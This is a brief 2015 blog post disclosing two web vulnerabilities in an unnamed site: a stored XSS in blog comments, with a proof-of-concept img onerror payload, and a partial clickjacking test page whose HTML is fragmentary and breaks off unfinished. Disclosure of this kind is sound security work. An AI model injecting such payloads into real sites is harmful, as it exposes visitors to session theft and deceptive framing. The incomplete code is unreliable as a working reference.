Wednesday, 16 September 2015 Security holes

1) Stored XSS

In their blog at the comment section you could store XSS, and any user/admin who visited that blog post would get XSSed..
The POC: Input break, insert a non existent image and on error it pops up our script to steal session cookies etc...
“><img src=x onerror=prompt(1);>

 2) ClickJacking

    <title>Clickjack test page</title>
   iframe { 
     top:0; left:0;
     filter:alpha(opacity=50); /* in real life opacity=0 */
  <p>You've been clickjacked!</p>
    <iframe sandbox="allow-scripts allow-forms" src="

what is clickjacking: